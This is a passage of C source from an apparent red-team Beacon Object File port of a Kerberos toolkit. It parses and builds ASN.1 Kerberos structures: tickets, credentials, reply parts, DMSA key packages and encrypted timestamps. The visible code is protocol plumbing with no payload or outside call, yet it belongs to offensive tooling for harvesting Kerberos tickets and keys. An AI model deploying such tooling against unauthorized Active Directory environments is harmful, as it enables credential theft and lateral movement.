                if (AsnGetString(&(a->sub[i].sub[0]), &(ticket->realm))) return true;
                break;
            case 2:
                if (AsnGetPrincipalName(&(a->sub[i].sub[0]), &(ticket->sname))) return true;
                break;
            case 3:
                if (AsnGetEncryptedData(&(a->sub[i].sub[0]), &(ticket->enc_part))) return true;
                break;
            default:
                break;
        }
    }
    return false;
}

bool AsnGetErrorCode(AsnElt* a, uint* error) {
    long long tmpLong = 0;
    for (int i = 0; i < a->subCount; i++) {
        if (a->sub[i].tagValue == 6) {
            if (AsnGetInteger(&(a->sub[i].sub[0]), &tmpLong))
                return true;
            *error = (uint)tmpLong;
            break;
        }
    }
    return false;
}

bool AsnGetEncryptionKey(AsnElt* a, EncryptionKey* enc_key) {
    long long tmpLong = 0;
    AsnElt s = a->sub[0];
    for (int i = 0; i < s.subCount; i++) {
        switch (s.sub[i].tagValue) {
            case 0:
                if (AsnGetInteger(&(s.sub[i].sub[0]), &tmpLong)) return true;
                enc_key->key_type = (int)tmpLong;
                break;
            case 1:
                if (AsnGetOctetString(&(s.sub[i].sub[0]), &(enc_key->key_value), &(enc_key->key_size))) return true;
                break;
            case 2:
                if (AsnGetOctetString(&(s.sub[i].sub[0]), &(enc_key->key_value), &(enc_key->key_size))) return true;
                break;
            default:
                break;
        }
    }
    return false;
}

bool AsnGetEncryptionKeySafe(AsnElt* keyElt, EncryptionKey* destKey) {
    if (!keyElt || !destKey)
        return true;

    AsnElt* seq = keyElt;
    if (!(seq->tagClass == 0 && seq->tagValue == 16)) {
        if (!seq->sub || seq->subCount == 0) return true;
        seq = &(seq->sub[0]);
    }

    // Now seq should point to the SEQUENCE with keytype[0] and keyvalue[1]
    if (!seq->sub || seq->subCount == 0) return true;

    for (int i = 0; i < seq->subCount; i++) {
        AsnElt* field = &(seq->sub[i]);
        if (!field->sub || field->subCount == 0) continue;

        if (field->tagValue == 0) { // keytype[0] INTEGER
            long kt = 0;
            if (!AsnGetInteger(&(field->sub[0]), &kt))
                destKey->key_type = (int)kt;
        }
        else if (field->tagValue == 1) { // keyvalue[1] OCTET STRING
            AsnGetOctetString(&(field->sub[0]), &(destKey->key_value), &(destKey->key_size));
        }
    }
    return false;
}

bool NodeAsnGetSting(AsnElt* a, int type, int* len, byte** ret) {
    if (a->sub != NULL) {
        PRINT_OUT("invalid string (constructed)");
        return true;
    }
    if (type == ASN_NumericString || type == ASN_PrintableString || type == ASN_IA5String || type == ASN_TeletexString ||type == ASN_UTCTime ||type == ASN_GeneralizedTime ){
        if (DecodeMono(a->objBuf, a->valOff, a->valLen, type, ret, len)) return true;
    }
    else if (type == ASN_UTF8String){
        //return DecodeUTF8(objBuf, valOff, valLen);
    }
    else if ( type == ASN_BMPString ) {
        //return DecodeUTF16(objBuf, valOff, valLen);
    }
    else if (type == ASN_UniversalString) {
        //return DecodeUTF32(objBuf, valOff, valLen);
    }
    else {
        PRINT_OUT("unsupported string type: %d\n", type);
        return true;
    }
    return false;
}

bool AsnGetTime2(AsnElt* a, int type, DateTime* dt) {
    bool isGen = FALSE;
    switch (type) {
        case ASN_UTCTime:
            break;
        case ASN_GeneralizedTime:
            isGen = TRUE;
            break;
        default:
            PRINT_OUT("unsupported date type: %d\n", type);
            return true;
    }

    int sLen = 0;
    byte* s = 0;
    if (NodeAsnGetSting(a, type, &sLen, &s)) return true;

    for (int i = 0; i < sLen; i++) {
        if (s[i] >= '0' && s[i] <= '9')
            continue;
        if (s[i] == '.' || s[i] == '+' || s[i] == '-' || s[i] == 'Z')
            continue;
        PRINT_OUT("invalid time string:");
        return true;
    }

    bool good = TRUE;
    int  tzHours = 0;
    int  tzMinutes = 0;
    bool negZ = FALSE;
    bool noTZ = FALSE;
    if (s[sLen - 1] == 'Z') {
        s[sLen - 1] = 0;
        sLen--;
    }
    else {
        int j = IndexOf(s, sLen, '+');
        if (j < 0) {
            int j = IndexOf(s, sLen, '-');
            negZ = TRUE;
        }
        if (j < 0) {
            noTZ = TRUE;
        }
        else {
            byte* t = s + j + 1;
        }
    }

    if ((noTZ && !isGen) || (sLen < 4)) {
        PRINT_OUT("invalid time string");
        return true;
    }
    byte* stime = s;
    int year = Dec2(stime, 0, &good);
    if (isGen) {
        year = year * 100 + Dec2(stime, 2, &good);
        stime += 4;
        sLen -= 4;
    }
    else {
        if (year < 50) year += 100;
        year += 1900;
        stime += 2;
        sLen -= 2;
    }
    int month = Dec2(stime, 0, &good);
    int day = Dec2(stime, 2, &good);
    int hour = Dec2(stime, 4, &good);
    int minute = Dec2(stime, 6, &good);
    int second = 0;
    int millisecond = 0;
    if (isGen) {
        second = Dec2(stime, 8, &good);
        if (sLen >= 12 && stime[10] == '.') {
            stime += 11;
            for (int i = 0; stime[i]; i++) {
                if (stime[i] < '0' || stime[i] > '9') {
                    good = FALSE;
                    break;
                }
            }
            millisecond = 10 * Dec2(stime, 0, &good) + Dec2(stime, 2, &good) / 10;
        }
        else if (sLen != 10) {
            good = FALSE;
        }
    }
    else {
        switch (sLen) {
            case 8:
                break;
            case 10:
                second = Dec2(s, 8, &good);
                break;
            default:
                PRINT_OUT("invalid time string");
                return true;
        }
    }

    if (!good) {
        PRINT_OUT("invalid time string");
        return true;
    }

    if (second == 60)
        second = 59;

    dt->isSet = TRUE;
    dt->year = year;
    dt->month = month;
    dt->day = day;
    dt->hour = hour;
    dt->minute = minute;
    dt->second = second;
    dt->millisecond = millisecond;
    return false;
}

bool AsnGetTime(AsnElt* a, DateTime* dt) {
    if (a->tagClass != ASN_UNIVERSAL) {
        PRINT_OUT("cannot infer date type: %d:%d\n", a->tagClass, a->tagValue);
        return true;
    }
    return AsnGetTime2(a, a->tagValue, dt);
}

bool AsnGetLastReq(AsnElt* a, LastReq* last_req) {
    long long tmpLong = 0;
    AsnElt s = a->sub[0];
    for (int i = 0; i < s.subCount; i++) {
        switch (s.sub[i].tagValue) {
            case 0:
                if (AsnGetInteger(&(s.sub[i].sub[0]), &tmpLong)) return true;
                last_req->lr_type = (int)tmpLong;
                break;
            case 1:
                if (AsnGetTime(&(s.sub[i].sub[0]), &(last_req->lr_value))) return true;
                break;
            default:
                break;
        }
    }
    return false;
}

bool AsnGetEncryptedPAData(AsnElt* body, EncryptedPAData* data) {
    for (int i = 0; i < body->sub[0].subCount; i++) {
        long long ll = 0;
        switch (body->sub[0].sub[i].tagValue) {
            case 1:
                if (AsnGetInteger(&(body->sub[0].sub[i].sub[0]), &ll)) return true;
                data->keytype = (int)ll;
                break;
            case 2:
                if (AsnGetOctetString(&(body->sub[0].sub[i].sub[0]), &(data->keyvalue), &(data->keysize))) return true;
                break;
            default:
                break;
        }
    }

    if (data->keytype == 162) { // KEY_LIST_REP
        AsnElt ae = { 0 };
        if (BytesToAsnDecode(data->keyvalue, data->keysize, &ae)) return true;
        if (AsnGetEncryptionKey(&ae, &(data->encryptionKey))) return true;
    }
    
    if (data->keytype == 171) { // DMSA_KEY_PACKAGE
        AsnElt ae = { 0 };
        if (BytesToAsnDecode(data->keyvalue, data->keysize, &ae)) return false;
        if (!ae.sub || ae.subCount == 0) return false;

        // current-keys[0] - SEQUENCE OF EncryptionKey
        if (ae.sub[0].tagValue == 0 && ae.sub[0].sub && ae.sub[0].subCount > 0) {
            AsnElt* keysSeq = &(ae.sub[0].sub[0]);
            int keyCount = keysSeq->subCount;
            if (keyCount > 0 && keysSeq->sub) {
                data->dmsaKeyPackage.currentKeys = MemAlloc(keyCount * sizeof(EncryptionKey));
                if (data->dmsaKeyPackage.currentKeys) {
                    memset(data->dmsaKeyPackage.currentKeys, 0, keyCount * sizeof(EncryptionKey));
                    data->dmsaKeyPackage.currentKeysCount = keyCount;
                    for (int i = 0; i < keyCount; i++) {
                        AsnGetEncryptionKeySafe(&(keysSeq->sub[i]), &(data->dmsaKeyPackage.currentKeys[i]));
                    }
                }
            }
        }

        // previous-keys[1] is OPTIONAL - check subCount
        int hasPreviousKeys = (ae.subCount == 4);
        if (hasPreviousKeys && ae.sub[1].tagValue == 1 && ae.sub[1].sub && ae.sub[1].subCount > 0) {
            AsnElt* keysSeq = &(ae.sub[1].sub[0]);
            int keyCount = keysSeq->subCount;
            if (keyCount > 0 && keysSeq->sub) {
                data->dmsaKeyPackage.previousKeys = MemAlloc(keyCount * sizeof(EncryptionKey));
                if (data->dmsaKeyPackage.previousKeys) {
                    memset(data->dmsaKeyPackage.previousKeys, 0, keyCount * sizeof(EncryptionKey));
                    data->dmsaKeyPackage.previousKeysCount = keyCount;
                    for (int i = 0; i < keyCount; i++) {
                        AsnGetEncryptionKeySafe(&(keysSeq->sub[i]), &(data->dmsaKeyPackage.previousKeys[i]));
                    }
                }
            }
        }

        // expiration-interval and fetch-interval
        int expIdx = hasPreviousKeys ? 2 : 1;
        int fetchIdx = hasPreviousKeys ? 3 : 2;
        if (ae.subCount > expIdx && ae.sub[expIdx].sub && ae.sub[expIdx].subCount > 0) {
            AsnGetTime(&(ae.sub[expIdx].sub[0]), &(data->dmsaKeyPackage.expirationInterval));
        }
        if (ae.subCount > fetchIdx && ae.sub[fetchIdx].sub && ae.sub[fetchIdx].subCount > 0) {
            AsnGetTime(&(ae.sub[fetchIdx].sub[0]), &(data->dmsaKeyPackage.fetchInterval));
        }
    }
    return false;
}

bool AsnGetEncKDCRepPart(AsnElt* a, EncKDCRepPart* rep_part) {
    for (int i = 0; i < a->subCount; i++) {
        int tagValue = a->sub[i].tagValue;
        if( tagValue == 0 ){
            if (AsnGetEncryptionKey(&(a->sub[i]), &(rep_part->key))) return true;
        }
        if( tagValue == 1 ){
            if (AsnGetLastReq(&(a->sub[i].sub[0]), &(rep_part->lastReq))) return true;
        }
        if( tagValue == 2 ){
            long long tmpLong = 0;
            if (AsnGetInteger(&(a->sub[i].sub[0]), &tmpLong)) return true;
            rep_part->nonce = (uint)tmpLong;
        }
        if( tagValue == 3 ){
            if (AsnGetTime(&(a->sub[i].sub[0]), &(rep_part->key_expiration))) return true;
        }
        if( tagValue == 4 ){
            long long tmpLong = 0;
            if (AsnGetInteger(&(a->sub[i].sub[0]), &tmpLong)) return true;
            rep_part->flags = (uint)tmpLong;
        }
        if( tagValue == 5 ){
            if (AsnGetTime(&(a->sub[i].sub[0]), &(rep_part->authtime))) return true;
        }
        if( tagValue == 6 ){
            if (AsnGetTime(&(a->sub[i].sub[0]), &(rep_part->starttime))) return true;
        }
        if( tagValue == 7 ){
            if (AsnGetTime(&(a->sub[i].sub[0]), &(rep_part->endtime))) return true;
        }
        if( tagValue == 8 ){
            if (AsnGetTime(&(a->sub[i].sub[0]), &(rep_part->renew_till))) return true;
        }
        if( tagValue == 9 ){
            if (AsnGetString(&(a->sub[i].sub[0]), &(rep_part->realm))) return true;
        }
        if( tagValue == 10 ){
            if (AsnGetPrincipalName(&(a->sub[i].sub[0]), &(rep_part->sname))) return true;
        }
        if( tagValue == 12 ){
            if (AsnGetEncryptedPAData(&(a->sub[i].sub[0]), &(rep_part->encryptedPaData))) return true;
        }
    }
    return false;
}

bool AsnGetKrbCredInfo(AsnElt* body, KrbCredInfo* info) {
    for (int i = 0; i < body->subCount; i++) {
        int tagValue = body->sub[i].tagValue;
        if (tagValue == 0) {
            if (AsnGetEncryptionKey(&(body->sub[i]), &(info->key))) return true;
        }
        if (tagValue == 1) {
            if (AsnGetString(&(body->sub[i].sub[0]), &(info->prealm))) return true;
        }
        if (tagValue == 2) {
            if (AsnGetPrincipalName(&(body->sub[i].sub[0]), &(info->pname))) return true;
        }
        if (tagValue == 3) {
            long tmpLong = 0;
            if (AsnGetInteger(&(body->sub[i].sub[0]), &tmpLong)) return true;
            info->flags = (uint)tmpLong;
        }
        if (tagValue == 4) {
            if (AsnGetTime(&(body->sub[i].sub[0]), &(info->authtime))) return true;
        }
        if (tagValue == 5) {
            if (AsnGetTime(&(body->sub[i].sub[0]), &(info->starttime))) return true;
        }
        if (tagValue == 6) {
            if (AsnGetTime(&(body->sub[i].sub[0]), &(info->endtime))) return true;
        }
        if (tagValue == 7) {
            if (AsnGetTime(&(body->sub[i].sub[0]), &(info->renew_till))) return true;
        }
        if (tagValue == 8) {
            if (AsnGetString(&(body->sub[i].sub[0]), &(info->srealm))) return true;
        }
        if (tagValue == 9) {
            if (AsnGetPrincipalName(&(body->sub[i].sub[0]), &(info->sname))) return true;
        }
    }
    return false;
}

bool AsnGetEncKrbCredPart(AsnElt* body, EncKrbCredPart* cred_part) {
    int octetStringLength = 0;
    byte* octetString = 0;
    if (AsnGetOctetString(&(body->sub[1].sub[0]), &octetString, &octetStringLength)) return true;

    AsnElt body2 = { 0 };
    if (BytesToAsnDecode3(octetString, octetStringLength, false, &body2)) return true;

    KrbCredInfo info = { 0 };
    if (AsnGetKrbCredInfo(&(body2.sub[0].sub[0].sub[0].sub[0]), &info)) return true;

    cred_part->ticket_count = 1;
    cred_part->ticket_info = MemAlloc(cred_part->ticket_count * sizeof(KrbCredInfo));
    cred_part->ticket_info[0] = info;

    return false;
}

bool AsnGetKrbCred(AsnElt* body, KRB_CRED* cred) {
    for (int i = 0; i < body->subCount; i++) {
        switch (body->sub[i].tagValue) {
            case 0:
                if (AsnGetInteger(&(body->sub[i].sub[0]), &(cred->pvno))) return true;
                break;
            case 1:
                if (AsnGetInteger(&(body->sub[i].sub[0]), &(cred->msg_type))) return true;
                break;
            case 2:
                cred->ticket_count = body->sub[i].sub[0].sub[0].subCount;
                if (cred->ticket_count) {
                    cred->tickets = MemAlloc(sizeof(Ticket) * cred->ticket_count);
                    for (int j = 0; j < cred->ticket_count; j++) {
                        Ticket ticket = { 0 };
                        if (AsnGetTicket(&(body->sub[i].sub[0].sub[0].sub[j]), &ticket)) return true;
                        cred->tickets[j] = ticket;
                    }
                }
                break;
            case 3:
                if (AsnGetEncKrbCredPart(&(body->sub[i].sub[0]), &(cred->enc_part))) return true;
                break;
            default:
                break;
        }
    }
    return false;
}

bool AsnGet_ETYPE_INFO2_ENTRY(AsnElt* body, ETYPE_INFO2_ENTRY* entry) {
    for (int i = 0; i < body->sub[0].subCount; i++) {
        long long ll = 0;
        switch (body->sub[0].sub[i].tagValue) {
            case 0:
                if (AsnGetInteger(&(body->sub[0].sub[i].sub[0]), &ll)) return true;
                entry->etype = (int)ll;
                break;
            case 1:
                if (AsnGetString(&(body->sub[0].sub[i].sub[0]), &(entry->salt))) return true;
                break;
            default:
                break;
        }
    }
    return false;
}

bool AsnGetPaData(AsnElt* body, PA_DATA* padata) {
    byte* valueBytes = NULL;
    int   valueBytesLength = 0;

    if (body->subCount > 1 && body->sub[0].subCount && body->sub[1].subCount) {
        AsnGetInteger(&(body->sub[0].sub[0]), &(padata->type));
        AsnGetOctetString(&(body->sub[1].sub[0]), &valueBytes, &valueBytesLength);
    }
    else if (body->subCount && body->sub[0].subCount > 1 && body->sub[0].sub[0].subCount && body->sub[0].sub[1].subCount) {
        AsnGetInteger(&(body->sub[0].sub[0].sub[0]), &(padata->type));
        AsnGetOctetString(&(body->sub[0].sub[1].sub[0]), &valueBytes, &valueBytesLength);
    }
    else {
        return true;
    }

    switch (padata->type) {
        case PADATA_PA_PAC_REQUEST:
            PRINT_OUT("--- AsnGetPaData --- case PADATA_PA_PAC_REQUEST");
            //	value = new KERB_PA_PAC_REQUEST(AsnElt.Decode(body.Sub[1].Sub[0].CopyValue()));
            break;
        case PADATA_PK_AS_REP:
            PRINT_OUT("--- AsnGetPaData --- case PADATA_PK_AS_REP");
            //	value = new PA_PK_AS_REP(AsnElt.Decode(body.Sub[1].Sub[0].CopyValue()));
            break;
        case PADATA_PA_S4U_X509_USER:
            break;
        case PADATA_ETYPE_INFO2:
            padata->value = MemAlloc(sizeof(ETYPE_INFO2_ENTRY));

            int masLength = ValueLength(&(body->sub[1].sub[0]));
            byte* mas = MemAlloc(masLength);
            masLength = EncodeValue(&(body->sub[1].sub[0]), 0, masLength, mas, 0);

            AsnElt a = { 0 };
            if (BytesToAsnDecode(mas, masLength, &a)) return true;

            if (AsnGet_ETYPE_INFO2_ENTRY(&a, padata->value)) return true;
            break;
    }
    return false;
}

bool AsnGetTGS_REP(AsnElt* asn_TGS_REP, TGS_REP* tgs_rep) {
    // TGS - REP::= [APPLICATION 13] KDC - REP

    if ((asn_TGS_REP->subCount != 1) || (asn_TGS_REP->sub[0].tagValue != 16)) {
        PRINT_OUT("First TGS-REP sub should be a sequence\n");
        return true;
    }
    AsnElt* kdc_rep = asn_TGS_REP->sub[0].sub;
    for (int i = 0; i < asn_TGS_REP->sub[0].subCount; i++) {
        int tagValue = kdc_rep[i].tagValue;
        if( tagValue == 0 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->pvno))) return true;
        }
        if( tagValue == 1 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->msg_type))) return true;
        }
        if( tagValue == 2 ) {
            if (AsnGetPaData(&(kdc_rep[i].sub[0]), &(tgs_rep->padata))) return true;
        }
        if( tagValue == 3 ) {
            if (AsnGetString(&(kdc_rep[i].sub[0]), &(tgs_rep->crealm))) return true;
        }
        if( tagValue == 4 ) {
            if (AsnGetPrincipalName(&(kdc_rep[i].sub[0]), &(tgs_rep->cname))) return true;
        }
        if( tagValue == 5 ) {
            if (AsnGetTicket(&(kdc_rep[i].sub[0].sub[0]), &(tgs_rep->ticket))) return true;
        }
        if( tagValue == 6 ) {
            if (AsnGetEncryptedData(&(kdc_rep[i].sub[0]), &(tgs_rep->enc_part))) return true;
        }
    }
    return false;
}


================================================
FILE: AD-BOF/Kerbeus-BOF/_include/asn_encode.c
================================================
#include "asn_convert.c"
#include "crypt_enc.c"

size_t my_wcslen(const wchar_t* str) {
    size_t len = 0;
    while (*str != L'\0') {
        len++;
        str++;
    }
    return len;
}

DateTime GetLocalTimeAdd(uint add) {
    char datatime[18];
    SYSTEMTIME systemTime;
    KERNEL32$GetSystemTime(&systemTime);
    FILETIME fileTime;
    KERNEL32$SystemTimeToFileTime(&systemTime, &fileTime);
    ULARGE_INTEGER uli;
    uli.LowPart = fileTime.dwLowDateTime;
    uli.HighPart = fileTime.dwHighDateTime;
    uli.QuadPart += ((ULONGLONG)add) * 10000000ULL;
    fileTime.dwLowDateTime = uli.LowPart;
    fileTime.dwHighDateTime = uli.HighPart;
    KERNEL32$FileTimeToSystemTime(&fileTime, &systemTime);
    DateTime dt = { 0 };
    dt.year = systemTime.wYear;
    dt.month = systemTime.wMonth;
    dt.day = systemTime.wDay;
    dt.hour = systemTime.wHour;
    dt.minute = systemTime.wMinute;
    dt.second = systemTime.wSecond;
    return dt;
}

DateTime GetGmTimeAdd(UINT add) {
    SYSTEMTIME systemTime;
    KERNEL32$GetSystemTime(&systemTime);
    if (add > 0) {
        FILETIME fileTime;
        KERNEL32$SystemTimeToFileTime(&systemTime, &fileTime);
        ULARGE_INTEGER uli;
        uli.LowPart = fileTime.dwLowDateTime;
        uli.HighPart = fileTime.dwHighDateTime;
        uli.QuadPart += ((ULONGLONG)add) * 10000000ULL;
        fileTime.dwLowDateTime = uli.LowPart;
        fileTime.dwHighDateTime = uli.HighPart;
        KERNEL32$FileTimeToSystemTime(&fileTime, &systemTime);
    }
    DateTime dt = { 0 };
    dt.year = systemTime.wYear;
    dt.month = systemTime.wMonth;
    dt.day = systemTime.wDay;
    dt.hour = systemTime.wHour;
    dt.minute = systemTime.wMinute;
    dt.second = systemTime.wSecond;
    return dt;
}

bool IsLittleEndian() {
    int num = 1;
    return (*((byte*)&num) == 1);
}

void ReverseBytes(byte* bytes, size_t length) {
    byte temp;
    for (size_t i = 0; i < length / 2; i++) {
        temp = bytes[i];
        bytes[i] = bytes[length - i - 1];
        bytes[length - i - 1] = temp;
    }
}

void FlasToBytes(UINT32 Options, byte* OptionsBytes) {
    *((UINT32*)OptionsBytes) = Options;
    if (IsLittleEndian())
        ReverseBytes(OptionsBytes, sizeof(UINT32));
}



int CodePoint(wchar_t* str, int* offset) {
    int c = str[(*offset)++];
    if (c >= 0xD800 && c < 0xDC00 && *offset < my_strlen(str)) {
        int d = str[(*offset)];
        if (d >= 0xDC00 && d < 0xE000) {
            (*offset)++;
            c = ((c & 0x3FF) << 10) + (d & 0x3FF) + 0x10000;
        }
    }
    return c;
}

bool EncodeMono(wchar_t* str, int* len, byte** ms) {
    *len = my_wcslen(str);
    *ms = MemAlloc(*len);
    int k = 0;
    while (*str != '\0') {
        (*ms)[k++] = *str;
        str++;
    }
    return false;
}

bool EncodeUTF8(wchar_t* str, int* len, byte** ms) {
    int k = 0;
    int n = my_wcslen(str);
    int capacity = 32;
    int size = 0;
    *ms = MemAlloc(n * 4);
    while (k < n) {
        int cp = CodePoint(str, &k);
        if (cp < 0x80) {
            (*ms)[size++] = (byte)cp;
        }
        else if (cp < 0x800) {
            (*ms)[size++] = (byte)(0xC0 + (cp >> 6));
            (*ms)[size++] = (byte)(0x80 + (cp & 63));
        }
        else if (cp < 0x10000) {
            (*ms)[size++] = (byte)(0xE0 + (cp >> 12));
            (*ms)[size++] = (byte)(0x80 + ((cp >> 6) & 63));
            (*ms)[size++] = (byte)(0x80 + (cp & 63));
        }
        else {
            (*ms)[size++] = (byte)(0xF0 + (cp >> 18));
            (*ms)[size++] = (byte)(0x80 + ((cp >> 12) & 63));
            (*ms)[size++] = (byte)(0x80 + ((cp >> 6) & 63));
            (*ms)[size++] = (byte)(0x80 + (cp & 63));
        }
    }
    *len = size;
    return false;
}

bool EncodeUTF16(const wchar_t* str, int* lenr, byte** buf) {
    size_t len = my_wcslen(str);
    *buf = MemAlloc(len * 2);
    int k = 0;
    for (size_t i = 0; i < len; i++) {
        char c = str[i];
        (*buf)[k++] = (byte)(c >> 8);
        (*buf)[k++] = (byte)c;
    }
    *lenr = len * 2;
    return false;
}

bool EncodeUTF32(const wchar_t* str, int* len, byte** ms) {
    size_t k = 0;
    size_t n = my_wcslen(str);
    size_t capacity = 32;
    size_t size = 0;
    *ms = MemAlloc(n * 4);
    while (k < n) {
        int cp = CodePoint(str, &k);
        (*ms)[size++] = (byte)(cp >> 24);
        (*ms)[size++] = (byte)(cp >> 16);
        (*ms)[size++] = (byte)(cp >> 8);
        (*ms)[size++] = (byte)cp;
    }
    *len = size;
    return false;
}



bool MakePrimitiveInner(int tagClass, int tagValue, byte* val, int off, int len, AsnElt* a) {
    a->objBufSize = len;
    if (my_copybuf(&(a->objBuf), val + off, len)) return true;

    a->objOff = 0;
    a->objLen = -1;
    a->valOff = 0;
    a->valLen = len;
    a->hasEncodedHeader = false;
    a->tagClass = tagClass;
    a->tagValue = tagValue;
    a->sub = NULL;
    a->subCount = 0;
    return false;
}

bool MakeIntegerLong(long long x, AsnElt* asn_elt) {
    int k = 1;
    if (x >= 0) {
        for (unsigned long long w = x; w >= 0x80; w >>= 8)
            k++;
    }
    else {
        for (long long w = x; w <= -(long)0x80; w >>= 8)
            k++;
    }

    byte* v = MemAlloc(k);
    if (!v) return true;
    int len = k;
    for (long long w = x; k > 0; w >>= 8)
        v[--k] = (byte)w;

    return MakePrimitiveInner(ASN_UNIVERSAL, ASN_INTEGER, v, 0, len, asn_elt);
}

bool Make4(int tagClass, int tagValue, AsnElt* subs, int subsCount, AsnElt* a) {
    if (!a) return true;
    if (tagClass < 0 || tagClass > 3 || tagValue < 0) {
        PRINT_OUT("Invalid: tag class - %d\n, tag value - %d\n", tagClass, tagValue);
        return true;
    }
    a->objBuf = NULL;
    a->objBufSize = 0;
    a->objOff = 0;
    a->objLen = -1;
    a->valOff = 0;
    a->valLen = -1;
    a->hasEncodedHeader = false;
    a->tagClass = tagClass;
    a->tagValue = tagValue;
    if (subs == NULL) {
        a->subCount = 0;
        a->sub = 0;
    }
    else {
        a->subCount = subsCount;
        a->sub = MemAlloc(subsCount * sizeof(AsnElt));
        if (!a->sub) {
            PRINT_OUT("[x] Failed alloc memory");
            return true;
        }
        for (int i = 0; i < subsCount; i++)
            a->sub[i] = subs[i];
    }
    return false;
}

bool Make3(int tagValue, AsnElt* subs, int subsCount, AsnElt* a) {
    return Make4(ASN_UNIVERSAL, tagValue, subs, subsCount, a);
}

bool MakeBlob(byte* buf, int off, int len, AsnElt* a) {
    return MakePrimitiveInner(ASN_UNIVERSAL, ASN_OCTET_STRING, buf, off, len, a);
}

bool MakeExplicit(int tagClass, int tagValue, AsnElt* subs, int subsCount, AsnElt* a) {
    return Make4(tagClass, tagValue, subs, subsCount, a);
}

bool MakeImplicit(int tagClass, int tagValue, AsnElt* x, AsnElt* a) {
    if (x->sub != NULL)
        return Make4(tagClass, tagValue, x->sub, x->subCount, a);

    a->objOff = 0;
    a->objLen = -1;
    a->hasEncodedHeader = FALSE;
    a->tagClass = tagClass;
    a->tagValue = tagValue;
    a->sub = NULL;
    a->subCount = 0;
    if (x->objBuf) {
        a->objBuf = x->objBuf;
        a->objBufSize = x->objBufSize;
        a->valOff = x->valOff;
        a->valLen = x->valLen;
    }
    else {
        a->objBuf = MemAlloc(EncodedLength(x));
        a->objBufSize = EncodeValue(x, 0, EncodedLength(x), a->objBuf, 0);
        a->valOff = 0;
        a->valLen = x->objBufSize;
    }
    return false;
}

bool MakeBitString(byte* buf, size_t off, size_t len, AsnElt* a) {
    byte* tmp = MemAlloc(len + 1);
    if (tmp == NULL)
        return true;

    *tmp = 0;
    MemCpy(tmp + 1, buf + off, len);
    return MakePrimitiveInner(ASN_UNIVERSAL, ASN_BIT_STRING, tmp, 0, len + 1, a);
}

bool MakeString(int type, char* str, AsnElt* a) {
    int wlength = KERNEL32$MultiByteToWideChar(CP_ACP, 0, str, -1, NULL, 0);
    wchar_t* wstr = MemAlloc((wlength) * sizeof(wchar_t));
    KERNEL32$MultiByteToWideChar(CP_ACP, 0, str, -1, wstr, wlength);
    byte* buf;
    int len = 0;
    if( type == ASN_NumericString || type == ASN_PrintableString || type == ASN_UTCTime || type == ASN_GeneralizedTime || type == ASN_TeletexString || type == ASN_IA5String || type == ASN_GeneralString ) {
        if (EncodeMono(wstr, &len, &buf)) return true;
    }
    if ( type == ASN_UTF8String ) {
        if (EncodeUTF8(wstr, &len, &buf)) return true;
    }
    if (type == ASN_BMPString) {
        if (EncodeUTF16(wstr, &len, &buf)) return true;
    }
    if(type == ASN_UniversalString) {
        if (EncodeUTF32(wstr, &len, &buf)) return true;
    }
    return MakePrimitiveInner(ASN_UNIVERSAL, type, buf, 0, len, a);
}



bool PackIntegerLong(int tagValue, int var, AsnElt* varSeqContext) {
    AsnElt varAsn = { 0 }, varSeq = { 0 };
    if ( MakeIntegerLong(var, &varAsn)
         || Make3(ASN_SEQUENCE, &varAsn, 1, &varSeq)
         || MakeImplicit(ASN_CONTEXT, tagValue, &varSeq, varSeqContext) )
        return true;

    return false;
}

bool PackString(int tagValue, int type, char* var, AsnElt* varSeqContext){
    AsnElt varAsn = { 0 }, varSeq = { 0 };
    if ( MakeString( type, var, &varAsn)
         || Make3(ASN_SEQUENCE, &varAsn, 1, &varSeq)
         || MakeImplicit(ASN_CONTEXT, tagValue, &varSeq, varSeqContext) )
        return true;
    return false;
}

bool PackStringExt(int tagValue, int type, int imp_type, char* var, AsnElt* varSeqContext){
    AsnElt varAsn = { 0 }, var2Asn = { 0 }, varSeq = { 0 };
    if ( MakeString( type, var, &varAsn)
         || MakeImplicit(ASN_UNIVERSAL, imp_type, &varAsn, &var2Asn)
         || Make3(ASN_SEQUENCE, &var2Asn, 1, &varSeq)
         || MakeImplicit(ASN_CONTEXT, tagValue, &varSeq, varSeqContext) )
        return true;
    return false;
}

bool PackBitString(int tagValue, byte* var, int varLen, AsnElt* varSeqContext) {
    AsnElt varAsn = { 0 }, varSeq = { 0 };
    if ( MakeBitString(var, 0, varLen, &varAsn)
         || Make3(ASN_SEQUENCE, &varAsn, 1, &varSeq)
         || MakeImplicit(ASN_CONTEXT, tagValue, &varSeq, varSeqContext) )
        return true;
    return false;
}

bool PackBlock(int tagValue, byte* var, int varLen, AsnElt* varSeqContext) {
    AsnElt varAsn = { 0 }, varSeq = { 0 };
    if ( MakeBlob(var, 0, varLen, &varAsn)
         || Make3(ASN_SEQUENCE, &varAsn, 1, &varSeq)
         || MakeImplicit(ASN_CONTEXT, tagValue, &varSeq, varSeqContext) )
        return TRUE;
    return false;
}



bool AsnEncTimeStampToPaDataEncode(EncryptionKey encKey, PA_DATA* pa_data) {
    bool status = false;
    pa_data->type = PADATA_ENC_TIMESTAMP;

    char datatime[18];
    DateTime dt = GetLocalTimeAdd(0);
    MSVCRT$sprintf(datatime, "%04d%02d%02d%02d%02d%02dZ", dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second);

    AsnElt patimestampSeqContext = { 0 };
    if (PackString(0, ASN_GeneralizedTime, datatime, &patimestampSeqContext)) return true;

    AsnElt totalSeq = { 0 };
    if (Make3(ASN_SEQUENCE, &patimestampSeqContext, 1, &totalSeq)) return true;

    int rawBytesSize = 0;
    byte* rawBytes = 0;
    if (AsnToBytesEncode(&totalSeq, &rawBytesSize, &rawBytes)) return true;

    byte* encBytes;
    if (encrypt(rawBytes, rawBytesSize, encKey.key_value, encKey.key_type, KRB_KEY_USAGE_AS_REQ_PA_ENC_TIMESTAMP, &encBytes, &rawBytesSize)) return true;

    EncryptedData* pEncData = MemAlloc(sizeof(EncryptedData));
    if (!pEncData) {
        PRINT_OUT("[x] Failed alloc memory");
        return false;
    }
    pEncData->etype = encKey.key_type;
    pEncData->kvno = 0;
    pEncData->cipher = encBytes;
    pEncData->cipher_size = rawBytesSize;

    pa_data->value = pEncData;
    return false;
}

bool AsnPrincipalNameEncode(PrincipalName* cname, AsnElt* RET) {
    // name-type[0] Int32
    AsnElt nameTypeSeqContext = { 0 };
    if (PackIntegerLong(0, cname->name_type, &nameTypeSeqContext)) return true;

    // name-string[1] SEQUENCE OF KerberosString
